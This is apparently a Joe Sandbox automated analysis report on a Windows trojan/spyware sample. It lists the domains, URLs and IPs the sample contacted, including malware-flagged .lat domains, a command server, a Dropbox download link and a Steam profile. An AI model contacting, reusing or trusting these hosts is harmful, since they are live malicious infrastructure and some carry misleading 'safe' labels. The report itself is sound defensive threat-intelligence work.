https://aleksandr-block.com/ta=	0%	Avira URL Cloud	safe
https://aleksandr-block.com/8m	0%	Avira URL Cloud	safe
https://aleksandr-block.com/	0%	Avira URL Cloud	safe
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42Hw	0%	Avira URL Cloud	safe
https://aleksandr-block.com/ob	0%	Avira URL Cloud	safe
http://www.microsoft.coV	0%	Avira URL Cloud	safe
http://crl.miD	0%	Avira URL Cloud	safe
https://aleksandr-block.com/pi	0%	Avira URL Cloud	safe
https://aleksandr-block.com:443/api	0%	Avira URL Cloud	safe
https://finickypwk.lat/apiK	100%	Avira URL Cloud	malware
https://miniatureyu.lat/api	100%	Avira URL Cloud	malware
https://forums.dropbox.com	0%	Avira URL Cloud	safe
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42HwJO0nTsV79T5KoSu-yl4tDEpx7hZIHIVq4NaQk-v2oYNtVLUO0U-Y08MKArMZNTfDiUmwIYFxkPnAHRbY7ZQs1nLkw8KJm-glI51g0mqSCqlI2ul7jMtRBCzgKWJW/file?dl=1#	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
aleksandr-block.com	188.114.96.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	false	high
edge-block-www-env.dropbox-dns.com	162.125.66.15	true	false	high
www-env.dropbox-dns.com	162.125.66.18	true	false	high
finickypwk.lat	unknown	unknown	true	unknown
washyceehsu.lat	unknown	unknown	true	unknown
kickykiduz.lat	unknown	unknown	true	unknown
shoefeatthe.lat	unknown	unknown	true	unknown
bloodyswif.lat	unknown	unknown	true	unknown
ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com	unknown	unknown	true	unknown
savorraiykj.lat	unknown	unknown	true	unknown
www.dropbox.com	unknown	unknown	false	high
miniatureyu.lat	unknown	unknown	true	unknown
leggelatez.lat	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
https://www.dropbox.com/static/api	false		high
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42HwJO0nTsV79T5KoSu-yl4tDEpx7hZIHIVq4NaQk-v2oYNtVLUO0U-Y08MKArMZNTfDiUmwIYFxkPnAHRbY7ZQs1nLkw8KJm-glI51g0mqSCqlI2ul7jMtRBCzgKWJW/file?dl=1#	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellosign.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered	k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2039858894.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011209541.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.docsend.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropboxstatic.com/static/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aleksandr-block.com/ta=	k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://officeapps-df.live.com	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aleksandr-block.com/F90=	k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.login.yahoo.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	k7h8uufe6Y.exe	false		high
https://login.yahoo.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://status.dropbox.com	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://aleksandr-block.com/8m	k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/playlist/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cevcsca2021.ocsp-certum.com07	k7h8uufe6Y.exe	false		high
https://onedrive.live.com/picker	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com:443/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca.crl0k	k7h8uufe6Y.exe	false		high
http://store.steampowered.com/privacy_agreement/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aleksandr-block.com/	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2053858893.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2052812917.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010933282.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061046652.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	k7h8uufe6Y.exe, 00000000.00000003.2023993461.0000000003BD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010857762.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1999141261.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	k7h8uufe6Y.exe	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/v/s/playlist/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	k7h8uufe6Y.exe, 00000000.00000003.2025744373.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com/cd/0/get/CiJShnOVB3rhN8F9ALH1R3ks42Hw	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privacy_agreement/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aleksandr-block.com/ob	k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://forums.dropbox.com	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/document/fsip/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/help	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false		high
https://help.dropbox.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/fsip/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canny.io/sdk.js	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aleksandr-block.com:443/api	k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D4D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	k7h8uufe6Y.exe, 00000000.00000003.1999141261.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://selfguidedlearning.dropboxbusiness.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.miD	k7h8uufe6Y.exe, 00000000.00000003.2011066767.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2012574980.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011976232.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.coV	k7h8uufe6Y.exe, 00000000.00000003.2011066767.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2012574980.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011976232.0000000003BB3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/csp_	k7h8uufe6Y.exe, 00000000.00000002.2119374553.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/presentation/fsip/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	k7h8uufe6Y.exe, 00000000.00000003.1999308370.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl-web.dropbox.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://app.hellofax.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://finickypwk.lat/apiK	k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aleksandr-block.com/pi	k7h8uufe6Y.exe, 00000000.00000003.2060018459.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2011123544.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037717047.0000000003B98000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037783656.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2119446736.0000000003BA2000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079443911.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2061582025.0000000003B9D000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2010933282.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115271663.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cfl.dropboxstatic.com/static/images/favicon.ico	k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2115288782.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, VMB7R5ASJ9ZHN3G5.exe.0.dr	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=iUcMsAN_acD6&l=e	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://miniatureyu.lat/api	k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/about/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/service_worker.js	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctsca2021.cer0A	k7h8uufe6Y.exe	false		high
http://crl.certum.pl/ctsca2021.crl0o	k7h8uufe6Y.exe	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellofax.com/	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pal-test.adyen.com	k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	k7h8uufe6Y.exe, 00000000.00000003.1998052434.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1998138957.0000000003BDB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.66.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
188.114.96.3	aleksandr-block.com	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
162.125.66.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590537
Start date and time:	2025-01-14 08:54:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	k7h8uufe6Y.exe renamed because original name is a hash value
Original Sample Name:	942d9e96f053c02c029afd39ec71386285190e972457be9d8e0d310c4c5b4f28.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/2@12/4
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target k7h8uufe6Y.exe, PID 6372 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:55:29	API Interceptor	11x Sleep call for process: k7h8uufe6Y.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.125.66.18	SDIO_R773.exe	Get hash	malicious	LummaC	Browse
	Message.eml	Get hash	malicious	Unknown	Browse
	https://docsend.com/view/sutbz9ibkqcisjtv	Get hash	malicious	Unknown	Browse
	Jeffparish.docx	Get hash	malicious	Unknown	Browse
	Remittance details.docx	Get hash	malicious	Unknown	Browse
	Remittance details.docx	Get hash	malicious	Unknown	Browse
	universityform.xlsm	Get hash	malicious	Unknown	Browse
	universityform.xlsm	Get hash	malicious	Unknown	Browse
	universityform.xlsm	Get hash	malicious	Unknown	Browse
	https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2M	Get hash	malicious	Unknown	Browse
188.114.96.3	New Order#12125.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	1001-13.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/pgw3/
	trow.exe	Get hash	malicious	Unknown	Browse	www.tc17.com/
	HN1GiQ5tF7.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	AxKxwW9WGa.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/8g74/?wtE0B=1LjxZz&9F=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
